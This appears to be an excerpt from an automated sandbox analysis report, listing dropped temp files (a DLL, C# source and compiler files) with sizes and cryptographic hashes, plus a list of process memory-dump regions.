674af2751d8709aa32bc1c072e03af6ebbcb79509423bebf2ee2da96b3bd2703ebe2c3bd81d5e82e0d2f6b8c50b53e42f959ca7479ff4ad309e0f61d4cbddb0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\xbsaw2lr\xbsaw2lr.dll

Filesize
4KB

MD5
b86167bdbb0b69c0cfd418807f027fe0

SHA1
e86adf7296cf08cabfdf6441c1f1f31b2f96bdad

SHA256
e5ae68ad2d728af71480b5f4c5ac1059667d5eb71fd855abf7c6fccc6961edfd

SHA512
2380a977affcd431fd8a3f7bb3b1154767d2c40d2dfacb3492105754366da02b03ee2712ea71247acd9ce8177f0806a108195604b813ac7f70963bc6438a1ff5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xbsaw2lr\CSCBC43A9F7E4CC4BB1BEF6E558C83F5ADB.TMP

Filesize
652B

MD5
0c7945b31aadabac9ed22f5f9d7cb643

SHA1
411ae261d10a37fa8926c220c88264497d2c484a

SHA256
462302f81585bbd394ae0001eaf29ec928b67cb3f73d91637beba3e2e7c7b066

SHA512
4753225ccd5b62b64b5b24f40b8c8b234e6b191b4db70d908876ef6118b0f542676dd61b0dbd3499661a3fec7824f5337b0fa4934c179dfe2793ce7c1c2d6c34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xbsaw2lr\xbsaw2lr.0.cs

Filesize
1KB

MD5
fdf024e67495f97bc2fd78ce27a53881

SHA1
ecee1f132b5a72bebadcb0b936ff492b884e772f

SHA256
273822b181fba975521e38b824faf542fffcb562bf3058b9b28ed427d69e82d0

SHA512
f3c783568202984164cb90a6492944b08d0eedb7a2ed8bded89b6e30e28e693504fb0a81b3e30070b29b2043ed5b64c602cde7525546bd9b218e3a2d216f99cd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xbsaw2lr\xbsaw2lr.cmdline

Filesize
369B

MD5
0a0c4b98d234cc51781f610229bd5181

SHA1
e7f8aae31c13bf512805db7d1a63f72877c1eb09

SHA256
82a84917b6c6c822732c629200d8bd153821c307f7b68c17ded738280aa626b3

SHA512
cbd7b9d046d501dd858c510743afa061dfd314b2373516b3c41203d6dc2a84de7e290d2066ac9ece9b056a999c9a1281540a1cae51b05a6f0dc14cac2f91623d

Download Submit
memory/32-141-0x0000000000000000-mapping.dmp

Download
memory/2396-144-0x0000000000000000-mapping.dmp

Download
memory/3312-135-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/3312-134-0x0000000004B30000-0x0000000005158000-memory.dmp

Filesize
6.2MB

Download
memory/3312-139-0x0000000007480000-0x0000000007AFA000-memory.dmp

Filesize
6.5MB

Download
memory/3312-132-0x0000000000000000-mapping.dmp

Download
memory/3312-136-0x0000000005230000-0x0000000005296000-memory.dmp

Filesize
408KB

Download
memory/3312-138-0x0000000005A40000-0x0000000005A5E000-memory.dmp

Filesize
120KB

Download
memory/3312-137-0x00000000052A0000-0x0000000005306000-memory.dmp

Filesize
408KB

Download
memory/3312-140-0x0000000005FC0000-0x0000000005FDA000-memory.dmp

Filesize
104KB

Download
memory/3312-133-0x00000000044C0000-0x00000000044F6000-memory.dmp

Filesize
216KB

Download
memory/3312-148-0x0000000006E00000-0x0000000006E96000-memory.dmp

Filesize
600KB

Download
memory/3312-149-0x0000000006D20000-0x0000000006D42000-memory.dmp

Filesize
136KB

Download
memory/3312-150-0x0000000007B00000-0x00000000080A4000-memory.dmp

Filesize
5.6MB

Download
memory/3312-151-0x0000000006C20000-0x0000000006D20000-memory.dmp

Filesize
1024KB

Download
memory/3312-152-0x0000000006C20000-0x0000000006D20000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing